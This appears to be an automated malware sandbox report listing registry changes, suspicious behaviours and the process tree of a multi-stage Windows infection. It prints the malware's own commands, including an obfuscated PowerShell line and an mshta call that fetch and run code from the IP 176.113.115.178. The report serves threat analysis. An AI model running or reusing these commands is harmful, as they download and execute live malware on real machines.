\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732241527" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1CEB11FC-AAA2-4D46-AC7F-70CB91DA5A1F}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 22 Nov 2024 02:12:08 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Applications crashreporter.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Applications\crashreporter.exe crashreporter.exe Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Applications\crashreporter.exe\IsHostApp = "0" crashreporter.exe Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Applications\crashreporter.exe\NoOpenWith = "0" crashreporter.exe Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Applications\crashreporter.exe\NoStartPage = "0" crashreporter.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3200 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4372 document.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3604 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe 3604 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe 3452 skotes.exe 3452 skotes.exe 3012 powershell.exe 2872 powershell.exe 3012 powershell.exe 2872 powershell.exe 4540 powershell.exe 4540 powershell.exe 1248 powershell.exe 1248 powershell.exe 1248 powershell.exe 408 powershell.exe 408 powershell.exe 408 powershell.exe 4932 powershell.exe 4932 powershell.exe 4932 powershell.exe 5644 powershell.exe 5644 powershell.exe 5644 powershell.exe 5376 powershell.exe 5376 powershell.exe 5376 powershell.exe 2296 FunnyJellyfish.tmp 2296 FunnyJellyfish.tmp 5424 regsvr32.exe 5424 regsvr32.exe 4372 document.exe 4372 document.exe 5424 regsvr32.exe 5424 regsvr32.exe 5424 regsvr32.exe 5424 regsvr32.exe 452 powershell.exe 452 powershell.exe 452 powershell.exe 1436 skotes.exe 1436 skotes.exe 4776 powershell.exe 4776 powershell.exe 4776 powershell.exe 5424 regsvr32.exe 5424 regsvr32.exe 5424 regsvr32.exe 5424 regsvr32.exe 5424 regsvr32.exe 5424 regsvr32.exe 5424 regsvr32.exe 5340 a04afe293b.exe 5340 a04afe293b.exe 6052 03eba3a65b.exe 6052 03eba3a65b.exe 2096 6fd3a149c6.exe 2096 6fd3a149c6.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 4756 LB31.exe 2732 powershell.exe 2732 powershell.exe 2732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 3728 RegSvcs.exe Token: SeDebugPrivilege 4540 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 4372 document.exe Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 5644 powershell.exe Token: SeDebugPrivilege 5376 powershell.exe Token: SeDebugPrivilege 4372 document.exe Token: SeDebugPrivilege 452 powershell.exe Token: SeIncreaseQuotaPrivilege 452 powershell.exe Token: SeSecurityPrivilege 452 powershell.exe Token: SeTakeOwnershipPrivilege 452 powershell.exe Token: SeLoadDriverPrivilege 452 powershell.exe Token: SeSystemProfilePrivilege 452 powershell.exe Token: SeSystemtimePrivilege 452 powershell.exe Token: SeProfSingleProcessPrivilege 452 powershell.exe Token: SeIncBasePriorityPrivilege 452 powershell.exe Token: SeCreatePagefilePrivilege 452 powershell.exe Token: SeBackupPrivilege 452 powershell.exe Token: SeRestorePrivilege 452 powershell.exe Token: SeShutdownPrivilege 452 powershell.exe Token: SeDebugPrivilege 452 powershell.exe Token: SeSystemEnvironmentPrivilege 452 powershell.exe Token: SeRemoteShutdownPrivilege 452 powershell.exe Token: SeUndockPrivilege 452 powershell.exe Token: SeManageVolumePrivilege 452 powershell.exe Token: 33 452 powershell.exe Token: 34 452 powershell.exe Token: 35 452 powershell.exe Token: 36 452 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeIncreaseQuotaPrivilege 4776 powershell.exe Token: SeSecurityPrivilege 4776 powershell.exe Token: SeTakeOwnershipPrivilege 4776 powershell.exe Token: SeLoadDriverPrivilege 4776 powershell.exe Token: SeSystemProfilePrivilege 4776 powershell.exe Token: SeSystemtimePrivilege 4776 powershell.exe Token: SeProfSingleProcessPrivilege 4776 powershell.exe Token: SeIncBasePriorityPrivilege 4776 powershell.exe Token: SeCreatePagefilePrivilege 4776 powershell.exe Token: SeBackupPrivilege 4776 powershell.exe Token: SeRestorePrivilege 4776 powershell.exe Token: SeShutdownPrivilege 4776 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeSystemEnvironmentPrivilege 4776 powershell.exe Token: SeRemoteShutdownPrivilege 4776 powershell.exe Token: SeUndockPrivilege 4776 powershell.exe Token: SeManageVolumePrivilege 4776 powershell.exe Token: 33 4776 powershell.exe Token: 34 4776 powershell.exe Token: 35 4776 powershell.exe Token: 36 4776 powershell.exe Token: SeIncreaseQuotaPrivilege 4776 powershell.exe Token: SeSecurityPrivilege 4776 powershell.exe Token: SeTakeOwnershipPrivilege 4776 powershell.exe Token: SeLoadDriverPrivilege 4776 powershell.exe Token: SeSystemProfilePrivilege 4776 powershell.exe Token: SeSystemtimePrivilege 4776 powershell.exe Token: SeProfSingleProcessPrivilege 4776 powershell.exe Token: SeIncBasePriorityPrivilege 4776 powershell.exe Token: SeCreatePagefilePrivilege 4776 powershell.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 3604 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe 2296 FunnyJellyfish.tmp 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe -
Suspicious use of SendNotifyMessage 30 IoCs
pid Process 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe 2460 3dd24738bd.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4372 document.exe 3440 firefox.exe 1780 Conhost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 4488 RuntimeBroker.exe 3552 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3604 wrote to memory of 3452 3604 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe 83 PID 3604 wrote to memory of 3452 3604 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe 83 PID 3604 wrote to memory of 3452 3604 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe 83 PID 3452 wrote to memory of 4848 3452 skotes.exe 85 PID 3452 wrote to memory of 4848 3452 skotes.exe 85 PID 4848 wrote to memory of 4544 4848 file.exe 86 PID 4848 wrote to memory of 4544 4848 file.exe 86 PID 4544 wrote to memory of 2872 4544 wscript.exe 89 PID 4544 wrote to memory of 2872 4544 wscript.exe 89 PID 4544 wrote to memory of 3012 4544 wscript.exe 90 PID 4544 wrote to memory of 3012 4544 wscript.exe 90 PID 2872 wrote to memory of 1044 2872 powershell.exe 94 PID 2872 wrote to memory of 1044 2872 powershell.exe 94 PID 1044 wrote to memory of 1856 1044 WScript.exe 97 PID 1044 wrote to memory of 1856 1044 WScript.exe 97 PID 3012 wrote to memory of 2612 3012 powershell.exe 99 PID 3012 wrote to memory of 2612 3012 powershell.exe 99 PID 1856 wrote to memory of 752 1856 cmd.exe 100 PID 1856 wrote to memory of 752 1856 cmd.exe 100 PID 3012 wrote to memory of 3728 3012 powershell.exe 101 PID 3012 wrote to memory of 3728 3012 powershell.exe 101 PID 3012 wrote to memory of 3728 3012 powershell.exe 101 PID 3012 wrote to memory of 3728 3012 powershell.exe 101 PID 3012 wrote to memory of 3728 3012 powershell.exe 101 PID 3012 wrote to memory of 3728 3012 powershell.exe 101 PID 3012 wrote to memory of 3728 3012 powershell.exe 101 PID 3012 wrote to memory of 3728 3012 powershell.exe 101 PID 752 wrote to memory of 4540 752 mshta.exe 103 PID 752 wrote to memory of 4540 752 mshta.exe 103 PID 4540 wrote to memory of 1248 4540 powershell.exe 105 PID 4540 wrote to memory of 1248 4540 powershell.exe 105 PID 3452 wrote to memory of 5332 3452 skotes.exe 111 PID 3452 wrote to memory of 5332 3452 skotes.exe 111 PID 3452 wrote to memory of 5332 3452 skotes.exe 111 PID 5332 wrote to memory of 4828 5332 FunnyJellyfish.exe 112 PID 5332 wrote to memory of 4828 5332 FunnyJellyfish.exe 112 PID 5332 wrote to memory of 4828 5332 FunnyJellyfish.exe 112 PID 4828 wrote to memory of 4160 4828 FunnyJellyfish.tmp 113 PID 4828 wrote to memory of 4160 4828 FunnyJellyfish.tmp 113 PID 4828 wrote to memory of 4160 4828 FunnyJellyfish.tmp 113 PID 3452 wrote to memory of 4372 3452 skotes.exe 115 PID 3452 wrote to memory of 4372 3452 skotes.exe 115 PID 4160 wrote to memory of 5612 4160 cmd.exe 116 PID 4160 wrote to memory of 5612 4160 cmd.exe 116 PID 4160 wrote to memory of 5612 4160 cmd.exe 116 PID 4372 wrote to memory of 408 4372 document.exe 118 PID 4372 wrote to memory of 408 4372 document.exe 118 PID 4372 wrote to memory of 4932 4372 document.exe 120 PID 4372 wrote to memory of 4932 4372 document.exe 120 PID 4372 wrote to memory of 5644 4372 document.exe 122 PID 4372 wrote to memory of 5644 4372 document.exe 122 PID 4372 wrote to memory of 5376 4372 document.exe 124 PID 4372 wrote to memory of 5376 4372 document.exe 124 PID 4160 wrote to memory of 5684 4160 cmd.exe 126 PID 4160 wrote to memory of 5684 4160 cmd.exe 126 PID 4160 wrote to memory of 5684 4160 cmd.exe 126 PID 5684 wrote to memory of 2296 5684 FunnyJellyfish.exe 127 PID 5684 wrote to memory of 2296 5684 FunnyJellyfish.exe 127 PID 5684 wrote to memory of 2296 5684 FunnyJellyfish.exe 127 PID 2296 wrote to memory of 6080 2296 FunnyJellyfish.tmp 128 PID 2296 wrote to memory of 6080 2296 FunnyJellyfish.tmp 128 PID 2296 wrote to memory of 6080 2296 FunnyJellyfish.tmp 128 PID 6080 wrote to memory of 5424 6080 regsvr32.exe 129 PID 6080 wrote to memory of 5424 6080 regsvr32.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1020
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1212 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1436
-
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll2⤵
- Loads dropped DLL
PID:4744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"3⤵
- Command and Scripting Interpreter: PowerShell
PID:6260 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5336
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
PID:2096
-
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll2⤵
- Loads dropped DLL
PID:5784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"3⤵
- Command and Scripting Interpreter: PowerShell
PID:6348
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵PID:5968
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1468
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2672
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2036
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2236
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2740
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3040
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3360
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3444
-
C:\Users\Admin\AppData\Local\Temp\1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe"C:\Users\Admin\AppData\Local\Temp\1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update8⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:2408
-
